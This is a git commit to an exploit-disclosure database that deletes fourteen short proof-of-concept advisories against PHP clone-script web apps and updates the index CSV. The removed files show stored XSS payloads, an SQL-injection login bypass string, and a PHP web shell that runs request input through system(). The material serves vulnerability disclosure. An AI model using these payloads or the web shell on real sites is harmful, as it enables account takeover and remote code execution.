DB: 2018-09-17

29 changes to exploits/shellcodes Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting Naukri Clone Script - Persistent Cross-Site Scripting Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting Facebook Clone Script 1.0.5 - Cross-Site Scripting Schools Alert Management Script 2.0.2 - Arbitrary File Upload Lawyer Search Script 1.0.2 - Cross-Site Scripting Bitcoin MLM Software 1.0.2 - Cross-Site Scripting Select Your College Script 2.0.2 - Authentication Bypass Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting Learning and Examination Management System - Cross-Site Scripting Alibaba Clone Script 1.0.2 - Cross-Site Scripting Groupon Clone Script 3.0.2 - Cross-Site Scripting Schools Alert Management Script 2.0.2 - Authentication Bypass
2018-09-17 05:02:03 +00:00 · 2018-09-17 05:02:03 +00:00 · 3e5849385e
commit 3e5849385e
parent c1b7aa12fc
16 changed files with 1 additions and 287 deletions
--- a/exploits/macos/dos/45391.py
+++ b/exploits/macos/dos/45391.py
@ -1,5 +1,5 @@
 # Exploit Title: Apple MacOS 10.13.4 - Denial of Service (PoC)
-# Date: 2019-09-10
+# Date: 2018-09-10
 # Exploit Author: Sriram (@Sri_Hxor)
 # Vendor Homepage: https://support.apple.com/en-in/HT208848
 # Tested on: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0
--- a/exploits/php/webapps/43988.txt
+++ b/exploits/php/webapps/43988.txt
@ -1,19 +0,0 @@
-######################################################################################
-# Exploit Title: PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS.
-# Date: 06.02.2018
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: https://www.phpscriptsmall.com/product/doctor-search-script/
-# Category: Web Application
-# Version: 1.0.2
-# Tested on: Linux Mint
-# CVE: CVE-2018-6655
-#######################################################################################
-
-*Proof of Concept*
-1. Login as a user
-2. Goto "Edit Profile"
-3. Edit any field with "<script>alert("PKP")</script>"
-4. Save Profile
-5. You will be having a popup "PKP"
--- a/exploits/php/webapps/43989.txt
+++ b/exploits/php/webapps/43989.txt
@ -1,20 +0,0 @@
-######################################################################################
-# Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS
-# Date: 06.02.2018
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script
-# Category: Web Application
-# Version: =>3.0
-# Tested on: Linux Mint
-# CVE: NA
-#######################################################################################
-
-Proof of Concept
-=================
-1. Login as a user
-2. Goto "Edit Profile"
-3. Edit any field with "<script>alert("PKP")</script>"
-4. Save Profile
-5. You will be having a popup "PKP"
--- a/exploits/php/webapps/43990.txt
+++ b/exploits/php/webapps/43990.txt
@ -1,20 +0,0 @@
-######################################################################################
-# Exploit Title: Naukri Clone Script - Stored XSS
-# Date: 06.02.2018
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/
-# Category: Web Application
-# Version: 3.0.3
-# Tested on: Linux Mint
-# CVE: na
-#######################################################################################
-
-Proof of Concept
-=================
-1. Login as a jobseeker
-2. Goto "Edit Profile"
-3. Edit any field with "<script>alert("PKP")</script>"
-4. Save Profile
-5. You will be having a popup "PKP"
--- a/exploits/php/webapps/43991.txt
+++ b/exploits/php/webapps/43991.txt
@ -1,20 +0,0 @@
-######################################################################################
-# Exploit Title: Hot Scripts Clone : Script Classified - Stored XSS
-# Date: 06.02.2018
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/
-# Category: Web Application
-# Version: 3.1
-# Tested on: Linux Mint
-# CVE: na
-#######################################################################################
-
-Proof of Concept
-=================
-1. Login to Hot Scripts Clone : Script Classified
-2. Select Any Ads
-3. Goto below review section and put "<script>alert("PKP")</script>" as
-title or description
-4. You will have popup of "PKP"
--- a/exploits/php/webapps/44010.txt
+++ b/exploits/php/webapps/44010.txt
@ -1,19 +0,0 @@
-######################################################################################
-# Exploit Title: Facebook Clone Script 1.0.5 - Stored XSS
-# Date: 07.02.2018
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/
-# Category: Web Application
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Version: 1.0.5
-# Tested on: Linux Mint
-# CVE: CVE-2018-6858
-#######################################################################################
-
-Proof of Concept
-=================
-1. Login as a user
-2. Goto "Comment" option of any post
-3. Put "<script>alert("PKP")</script>" as comment
-4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44011.txt
+++ b/exploits/php/webapps/44011.txt
@ -1,22 +0,0 @@
-#################################################################################################################
-# Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution
-# Date: 07.02.2018
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
-# Category: Web Application
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Version: 2.0.2
-# Tested on: Linux Mint
-# CVE: CVE-2018-6860
-##################################################################################################################
-
-Proof of Concept
-=================
-1. Login as Student/Parent
-2. Go to "Edit Profile" to upload profile picture.
-3. Once you find upload section, upload following code as a PHP file: 
-    <?php
-        if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }
-    ?>
-4. Try to access given PHP file : [site.com]/malicious.php?cmd=ls
--- a/exploits/php/webapps/44012.txt
+++ b/exploits/php/webapps/44012.txt
@ -1,19 +0,0 @@
-#################################################################################################################
-# Exploit Title: Lawyer Search Script - 1.0.2 - Stored XSS
-# Date: 07.02.2018
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: https://www.phpscriptsmall.com/product/lawyer-script/
-# Category: Web Application
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Version: 1.0.2
-# Tested on: Linux Mint
-# CVE: CVE-2018-6861
-##################################################################################################################
-
-*Proof of Concept*
-
-1. Login into site
-2. Goto "Edit Profile"
-3. Put "<script>alert("PKP")</script>" in any field
-4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44013.txt
+++ b/exploits/php/webapps/44013.txt
@ -1,19 +0,0 @@
-########################################################################
-# Exploit Title: Bitcoin MLM Software 1.0.2 - Stored XSS
-# Date: 07.02.2018
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: https://www.phpscriptsmall.com/product/bitcoin-mlm/
-# Category: Web Application
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Version: 1.0.2
-# Tested on: Linux Mint
-# CVE: CVE-2018-6862
-##########################################################################
-
-*Proof of Concept*
-
-1. Login into the site
-2. Goto "Edit Profile"
-3. Put "<script>alert("PKP")</script>" in any field
-4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44014.txt
+++ b/exploits/php/webapps/44014.txt
@ -1,18 +0,0 @@
-######################################################################################
-# Exploit Title: Select Your College Script - 2.0.2 - Authentication Bypass
-# Date: 07.02.2018
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link:https://www.phpscriptsmall.com/product/select-your-college-script/
-# Category: Web Application
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Version: 2.0.2
-# Tested on: Linux Mint
-# CVE: CVE-2018-6863
-#######################################################################################
-
-Proof of Concept
-
-1. Goto login page
-2. put [admin' OR '1' = '1] as user and password field
-3. You will be logged in as an authenticated user
--- a/exploits/php/webapps/44015.txt
+++ b/exploits/php/webapps/44015.txt
@ -1,20 +0,0 @@
-#################################################################################################################
-# Exploit Title: Multi religion Responsive Matrimonial - 4.7.2 - Stored XSS
-# Date: 07.02.2018
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link:
-https://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/
-# Category: Web Application
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Version: 4.7.2
-# Tested on: Linux Mint
-# CVE: CVE-2018-6864
-##################################################################################################################
-
-*Proof of Concept*
-
-1. Login into site
-2. Goto "Edit Profile"
-3. Put "<script>alert("PKP")</script>" in any field
-4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44170.txt
+++ b/exploits/php/webapps/44170.txt
@ -1,19 +0,0 @@
-#######################################################
-# Exploit Title: Learning and Examination Management System Script 2.3.1 – Stored XSS
-# Date: 09.02.2018
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: https://www.phpscriptsmall.com/product/learning-examination-management-system/
-# Category: Web Application
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Version: 2.3.1
-# Tested on: Linux Mint
-# CVE: CVE-2018-6866
-#######################################################
-
-Proof of Concept
-----------------
-1. Login into the site
-2. Goto “Message” options
-3. Put <script>alert("PKP")</script> as message / reply message
-4. You will be having a popup “PKP”
--- a/exploits/php/webapps/44171.txt
+++ b/exploits/php/webapps/44171.txt
@ -1,19 +0,0 @@
-#######################################################
-# Exploit Title: Alibaba Clone Script 1.0.2 – Stored XSS
-# Date: 09.02.2018
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: https://www.phpscriptsmall.com/product/alibaba-clone/
-# Category: Web Application
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Version: 1.0.2
-# Tested on: Linux Mint
-# CVE: CVE-2018-6867
-#######################################################
-
-Proof of Concept
-----------------
-1. Login into the site
-2. Goto “Edit Profile”
-3. Put <script>alert("PKP")</script> in any field
-4. You will be having a popup “PKP”
--- a/exploits/php/webapps/44172.txt
+++ b/exploits/php/webapps/44172.txt
@ -1,19 +0,0 @@
-########################################################################
-# Exploit Title: Slickdeals/DealNews/Groupon Clone Script 3.0.2 – Stored XSS
-# Date: 09.02.2018
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: https://www.phpscriptsmall.com/product/groupon-clone-script/
-# Category: Web Application
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Version: 3.0.2
-# Tested on: Linux Mint
-# CVE: CVE-2018-6868
-##########################################################################
-
-Proof of Concept
------------------------
-1. Login into the site
-2. Goto “Edit Profile”
-3. Put <script>alert("PKP")</script> in any field
-4. You will be having a popup “PKP”
--- a/exploits/php/webapps/44185.txt
+++ b/exploits/php/webapps/44185.txt
@ -1,19 +0,0 @@
- ######################################################################################
-# Exploit Title: Schools Alert Management Script - 2.0.2 - Authentication Bypass
-# Date: 07.02.2018
-# Vendor Homepage: https://www.phpscriptsmall.com/
-# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
-# Category: Web Application
-# Exploit Author: Prasenjit Kanti Paul
-# Web: http://hack2rule.wordpress.com/
-# Version: 2.0.2
-# Tested on: Linux Mint
-# CVE: CVE-2018-6859
-#######################################################################################
-
-Proof of Concept
-=================
-1. Go to login page
-2. Choose Student/Parent/Management to login
-2. put [admin' OR '1' = '1] as user and password field
-3. You will be logged in as Student/Parent/Management
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -38614,19 +38614,9 @@ id,file,description,date,author,type,platform,port
 43978,exploits/php/webapps/43978.txt,"Joomla! Component JSP Tickets 1.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
 43980,exploits/php/webapps/43980.txt,"Student Profile Management System Script 2.0.6 - Authentication Bypass",2018-02-05,L0RD,webapps,php,
 43981,exploits/hardware/webapps/43981.txt,"Netis WF2419 Router - Cross-Site Scripting",2018-02-05,"Sajibe Kanti",webapps,hardware,
-43988,exploits/php/webapps/43988.txt,"Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
-43989,exploits/php/webapps/43989.txt,"Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
-43990,exploits/php/webapps/43990.txt,"Naukri Clone Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
-43991,exploits/php/webapps/43991.txt,"Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
 43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80
 43995,exploits/php/webapps/43995.txt,"Entrepreneur Dating Script 2.0.2 - Authentication Bypass",2018-02-07,L0RD,webapps,php,80
 44008,exploits/php/webapps/44008.txt,"Naukri Clone Script 3.0.3 - 'indus' SQL Injection",2018-02-10,L0RD,webapps,php,
-44010,exploits/php/webapps/44010.txt,"Facebook Clone Script 1.0.5 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
-44011,exploits/php/webapps/44011.txt,"Schools Alert Management Script 2.0.2 - Arbitrary File Upload",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
-44012,exploits/php/webapps/44012.txt,"Lawyer Search Script 1.0.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
-44013,exploits/php/webapps/44013.txt,"Bitcoin MLM Software 1.0.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
-44014,exploits/php/webapps/44014.txt,"Select Your College Script 2.0.2 - Authentication Bypass",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
-44015,exploits/php/webapps/44015.txt,"Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
 44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php,
 44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php,
 44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php,
@ -39455,10 +39445,6 @@ id,file,description,date,author,type,platform,port
 44164,exploits/php/webapps/44164.txt,"Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload",2018-02-22,"Ihsan Sencan",webapps,php,
 44165,exploits/php/webapps/44165.txt,"Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
 44166,exploits/jsp/webapps/44166.txt,"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities",2018-02-22,"Core Security",webapps,jsp,
-44170,exploits/php/webapps/44170.txt,"Learning and Examination Management System - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
-44171,exploits/php/webapps/44171.txt,"Alibaba Clone Script 1.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
-44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
-44185,exploits/php/webapps/44185.txt,"Schools Alert Management Script 2.0.2 - Authentication Bypass",2018-02-27,"Prasenjit Kanti Paul",webapps,php,
 44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
 44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,
 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,